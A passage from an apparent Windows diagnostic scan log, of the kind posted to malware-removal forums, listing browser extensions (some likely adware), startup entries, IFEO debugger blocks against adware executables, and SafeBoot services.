HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.6: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN) FF - HKLM\Software\MozillaPlugins\@wolfram.com/Mathematica: C:\Program Files (x86)\Common Files\Wolfram Research\Browser\10.0.0.5099479\npmathplugin.dll (Wolfram Research, Inc.) FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Users\hp\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll File not found FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\hp\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.) FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\hp\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.) FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 36.0.4\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 36.0.4\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 36.0.4\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 36.0.4\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014/09/03 22:21:58 | 000,000,000 | ---D | M] (No name found) -- C:\Users\hp\AppData\Roaming\mozilla\Extensions [2015/03/15 15:28:43 | 000,000,000 | ---D | M] (No name found) -- C:\Users\hp\AppData\Roaming\mozilla\Firefox\Profiles\p9cltphk.default\extensions [2014/10/03 23:49:52 | 000,000,000 | ---D | M] (GoSavE) -- C:\Users\hp\AppData\Roaming\mozilla\Firefox\Profiles\p9cltphk.default\extensions\HH2D2@jV.org [2014/10/03 23:49:52 | 000,000,000 | ---D | M] (YouttubeAddBlOckee) -- C:\Users\hp\AppData\Roaming\mozilla\Firefox\Profiles\p9cltphk.default\extensions\i@2PpURB6R.edu [2014/09/07 17:23:10 | 000,002,664 | ---- | M] () -- C:\Users\hp\AppData\Roaming\mozilla\firefox\profiles\p9cltphk.default\searchplugins\Ask.xml [2015/03/25 16:44:26 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions [2015/03/25 16:44:34 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [color=#E56717]========== Chrome ==========[/color] CHR - default_search_provider: (Enabled) CHR - default_search_provider: search_url = CHR - default_search_provider: suggest_url = CHR - plugin: Error reading preferences file CHR - Extension: No name found = C:\Users\hp\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.8.12_0\ CHR - Extension: No name found = C:\Users\hp\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpdjojdkbbmdfjfahjcgigfpmkopogic\1.35_0\ CHR - Extension: No name found = C:\Users\hp\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanbnempkjnhadplbfgdaagijdbdbjeb\1.9.38_0\ CHR - Extension: No name found = C:\Users\hp\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.2_0\ CHR - Extension: No name found = C:\Users\hp\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.68_0\ CHR - Extension: No name found = C:\Users\hp\AppData\Local\Google\Chrome\User Data\Default\Extensions\ncjakonhmeonjpoiobbogaomeojjpbdk\2.0\ CHR - Extension: No name found = C:\Users\hp\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.1.0.0_0\ CHR - Extension: No name found = C:\Users\hp\AppData\Local\Google\Chrome\User Data\Default\Extensions\ookhcbgokankfmjafalglpofmolfopek\2.0.0_0\ CHR - Extension: No name found = C:\Users\hp\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc\6.3_0\ O1 HOSTS File: ([2014/11/06 16:56:13 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts O2:[b]64bit:[/b] - BHO: (no name) - {0f8f2313-e7a4-4161-aa5c-a04b90e4900e} - No CLSID value found. O2:[b]64bit:[/b] - BHO: (no name) - {4e887e5f-63e3-4f26-9ebd-562fb63ef7bf} - No CLSID value found. O2 - BHO: (no name) - {0f8f2313-e7a4-4161-aa5c-a04b90e4900e} - No CLSID value found. O2 - BHO: (no name) - {4e887e5f-63e3-4f26-9ebd-562fb63ef7bf} - No CLSID value found. O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation) O2 - BHO: (Evernote extension) - {92EF2EAD-A7CE-4424-B0DB-499CF856608E} - C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) O3:[b]64bit:[/b] - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found. O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found. O4:[b]64bit:[/b] - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated) O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [MSC] C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [SysTrayApp] C:\Program Files\IDT\WDM\sttray64.exe (IDT, Inc.) O4 - HKLM..\Run: [AdobeCS5ServiceManager] C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe (Adobe Systems Incorporated) O4 - HKLM..\Run: [PWRISOVM.EXE] C:\Program Files\PowerISO\PWRISOVM.EXE (Power Software Ltd) O4 - HKLM..\Run: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe (Adobe Systems Incorporated) O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation) O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation) O4 - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000..\Run: [AdobeBridge] File not found O4 - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000..\Run: [Facebook Update] C:\Users\hp\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.) O4 - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000..\Run: [Messenger (Yahoo!)] C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe (Yahoo! Inc.) O4 - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000..\Run: [RESTART_STICKY_NOTES] C:\Windows\System32\StikyNot.exe File not found O4 - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000..\Run: [uTorrent] C:\Users\hp\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) O4 - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000..\Run: [Viber] C:\Users\hp\AppData\Local\Viber\Viber.exe () O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found O4 - Startup: C:\Users\hp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\hp\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) O4 - Startup: C:\Users\hp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk = C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3 O8:[b]64bit:[/b] - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200 File not found O8:[b]64bit:[/b] - Extra context menu item: Capture la sélection - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\Clip.html?clipAction=3 File not found O8:[b]64bit:[/b] - Extra context menu item: Capturer cette page - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\Clip.html?clipAction=1 File not found O8:[b]64bit:[/b] - Extra context menu item: Capturer l - Reg Error: Value error. File not found O8:[b]64bit:[/b] - Extra context menu item: Capturer le favori - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\Clip.html?clipAction=0 File not found O8:[b]64bit:[/b] - Extra context menu item: Capturer l'image - C:\Program Files (x86)\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=4 File not found O8:[b]64bit:[/b] - Extra context menu item: Capturer l'URL - C:\Program Files (x86)\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=0 File not found O8:[b]64bit:[/b] - Extra context menu item: image' - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\Clip.html?clipAction=4 File not found O8:[b]64bit:[/b] - Extra context menu item: Nouvelle note - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\NewNote.html () O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\Windows\SysWow64\GPhotos.scr (Google Inc.) O8 - Extra context menu item: Capture la sélection - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\Clip.html?clipAction=3 File not found O8 - Extra context menu item: Capturer cette page - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\Clip.html?clipAction=1 File not found O8 - Extra context menu item: Capturer l - Reg Error: Value error. File not found O8 - Extra context menu item: Capturer le favori - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\Clip.html?clipAction=0 File not found O8 - Extra context menu item: Capturer l'image - C:\Program Files (x86)\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=4 File not found O8 - Extra context menu item: Capturer l'URL - C:\Program Files (x86)\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=0 File not found O8 - Extra context menu item: image' - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\Clip.html?clipAction=4 File not found O8 - Extra context menu item: Nouvelle note - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\NewNote.html () O9:[b]64bit:[/b] - Extra Button: @C:\Program Files (x86)\Evernote\Evernote\OLIEResource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\AddNote.html () O9:[b]64bit:[/b] - Extra 'Tools' menuitem : @C:\Program Files (x86)\Evernote\Evernote\OLIEResource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\AddNote.html () O9 - Extra Button: @C:\Program Files (x86)\Evernote\Evernote\OLIEResource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\\EvernoteIERes\AddNote.html () O9 - Extra 'Tools' menuitem : @C:\Program Files (x86)\Evernote\Evernote\OLIEResource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\\EvernoteIERes\AddNote.html () O13[b]64bit:[/b] - gopher Prefix: missing O13 - gopher Prefix: missing O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object) O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{08448AB1-9641-456B-AC4F-9EB13576BB7B}: DhcpNameServer = 192.168.42.129 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{AB29FEBC-1E92-4ED0-B9A5-7D12604ED1B1}: DhcpNameServer = 192.168.1.1 O18:[b]64bit:[/b] - Protocol\Handler\ms-help - No CLSID value found O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation) O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation) O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation) O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation) O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation) O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found. O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found. O27:[b]64bit:[/b] - HKLM IFEO\bitguard.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\bprotect.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\bpsvc.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\browserdefender.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\browserprotect.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\browsersafeguard.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\dprotectsvc.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\jumpflip: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\protectedsearch.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\searchinstaller.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\searchprotection.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\searchprotector.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\searchsettings.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\searchsettings64.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\snapdo.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\stinst32.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\stinst64.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\umbrella.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\utiljumpflip.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\volaro: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\vonteera: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\websteroids.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27:[b]64bit:[/b] - HKLM IFEO\websteroidsservice.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\bitguard.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\bprotect.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\bpsvc.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\browserdefender.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\browserprotect.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\browsersafeguard.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\dprotectsvc.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\jumpflip: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\protectedsearch.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\searchinstaller.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\searchprotection.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\searchprotector.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\searchsettings.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\searchsettings64.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\snapdo.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\stinst32.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\stinst64.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\umbrella.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\utiljumpflip.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\volaro: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\vonteera: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\websteroids.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O27 - HKLM IFEO\websteroidsservice.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation) O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2014/11/18 00:35:10 | 000,000,000 | ---D | M] - C:\Autodesk -- [ NTFS ] O34 - HKLM BootExecute: (autocheck autochk *) O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %* O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %* O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %* O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3) O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2) O38 - SubSystems\\Windows: (ServerDll=sxssrv,4) NetSvcs:[b]64bit:[/b] AppMgmt - C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation) SafeBootMin:[b]64bit:[/b] AppMgmt - C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation) SafeBootMin:[b]64bit:[/b] Base - Driver Group SafeBootMin:[b]64bit:[/b] Boot Bus Extender - Driver Group SafeBootMin:[b]64bit:[/b] Boot file system - Driver Group SafeBootMin:[b]64bit:[/b] File system - Driver Group SafeBootMin:[b]64bit:[/b] Filter - Driver Group SafeBootMin:[b]64bit:[/b] HelpSvc - Service SafeBootMin:[b]64bit:[/b] MsMpSvc - C:\Program Files\Microsoft Security Client\MsMpEng.exe (Microsoft Corporation) SafeBootMin:[b]64bit:[/b] PCI Configuration - Driver Group SafeBootMin:[b]64bit:[/b] PNP Filter - Driver Group SafeBootMin:[b]64bit:[/b] Primary disk - Driver Group SafeBootMin:[b]64bit:[/b] sacsvr - Service SafeBootMin:[b]64bit:[/b] SCSI Class - Driver Group SafeBootMin:[b]64bit:[/b] System Bus Extender - Driver Group SafeBootMin:[b]64bit:[/b] vmms - Service SafeBootMin:[b]64bit:[/b] WinDefend - C:\Program Files\Windows Defender\MpSvc.dll (Microsoft Corporation) SafeBootMin:[b]64bit:[/b] {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootMin:[b]64bit:[/b] {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootMin:[b]64bit:[/b] {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootMin:[b]64bit:[/b] {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootMin:[b]64bit:[/b] {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootMin:[b]64bit:[/b] {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootMin:[b]64bit:[/b] {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse SafeBootMin:[b]64bit:[/b] {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootMin:[b]64bit:[/b] {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootMin:[b]64bit:[/b] {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootMin:[b]64bit:[/b] {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootMin:[b]64bit:[/b] {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy SafeBootMin:[b]64bit:[/b] {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers SafeBootMin:[b]64bit:[/b] {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootMin:[b]64bit:[/b] {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices SafeBootMin:[b]64bit:[/b] {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices SafeBootMin:[b]64bit:[/b] {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices SafeBootMin: Base - Driver Group SafeBootMin: Boot Bus Extender - Driver Group SafeBootMin: Boot file system - Driver Group SafeBootMin: File system - Driver Group SafeBootMin: Filter - Driver Group SafeBootMin: HelpSvc - Service SafeBootMin: PCI Configuration - Driver Group SafeBootMin: PNP Filter - Driver Group SafeBootMin: Primary disk - Driver Group SafeBootMin: sacsvr - Service SafeBootMin: SCSI Class - Driver Group SafeBootMin: System Bus Extender - Driver Group SafeBootMin: vmms - Service SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootMin: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy SafeBootMin: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices SafeBootMin: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices SafeBootMin: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices SafeBootNet:[b]64bit:[/b] AppMgmt - C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation) SafeBootNet:[b]64bit:[/b] Base - Driver Group SafeBootNet:[b]64bit:[/b] Boot Bus Extender - Driver Group SafeBootNet:[b]64bit:[/b] Boot file system - Driver Group SafeBootNet:[b]64bit:[/b] File system - Driver Group SafeBootNet:[b]64bit:[/b] Filter - Driver Group SafeBootNet:[b]64bit:[/b] HelpSvc - Service SafeBootNet:[b]64bit:[/b] Messenger - Service SafeBootNet:[b]64bit:[/b] MsMpSvc - C:\Program Files\Microsoft Security Client\MsMpEng.exe (Microsoft Corporation) SafeBootNet:[b]64bit:[/b] NDIS Wrapper - Driver Group SafeBootNet:[b]64bit:[/b] NetBIOSGroup - Driver Group SafeBootNet:[b]64bit:[/b] NetDDEGroup - Driver Group SafeBootNet:[b]64bit:[/b] Network - Driver Group SafeBootNet:[b]64bit:[/b] NetworkProvider - Driver Group SafeBootNet:[b]64bit:[/b] PCI Configuration - Driver Group SafeBootNet:[b]64bit:[/b] PNP Filter - Driver Group SafeBootNet:[b]64bit:[/b] PNP_TDI - Driver Group SafeBootNet:[b]64bit:[/b] Primary disk - Driver Group SafeBootNet:[b]64bit:[/b] rdsessmgr - Service SafeBootNet:[b]64bit:[/b] sacsvr - Service SafeBootNet:[b]64bit:[/b] SCSI Class - Driver Group SafeBootNet:[b]64bit:[/b] Streams Drivers - Driver Group SafeBootNet:[b]64bit:[/b] System Bus Extender - Driver Group SafeBootNet:[b]64bit:[/b] TDI - Driver Group SafeBootNet:[b]64bit:[/b] vmms - Service SafeBootNet:[b]64bit:[/b] WinDefend - C:\Program Files\Windows Defender\MpSvc.dll (Microsoft Corporation) SafeBootNet:[b]64bit:[/b] WudfUsbccidDriver - Driver SafeBootNet:[b]64bit:[/b] {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootNet:[b]64bit:[/b] {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootNet:[b]64bit:[/b] {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootNet:[b]64bit:[/b] {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootNet:[b]64bit:[/b] {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootNet:[b]64bit:[/b] {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootNet:[b]64bit:[/b] {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse SafeBootNet:[b]64bit:[/b] {4D36E972-E325-11CE-BFC1-08002BE10318} - Net SafeBootNet:[b]64bit:[/b] {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient SafeBootNet:[b]64bit:[/b] {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService SafeBootNet:[b]64bit:[/b] {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans SafeBootNet:[b]64bit:[/b] {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootNet:[b]64bit:[/b] {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootNet:[b]64bit:[/b] {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootNet:[b]64bit:[/b] {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootNet:[b]64bit:[/b] {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readers SafeBootNet:[b]64bit:[/b] {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy SafeBootNet:[b]64bit:[/b] {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers SafeBootNet:[b]64bit:[/b] {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootNet:[b]64bit:[/b] {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices 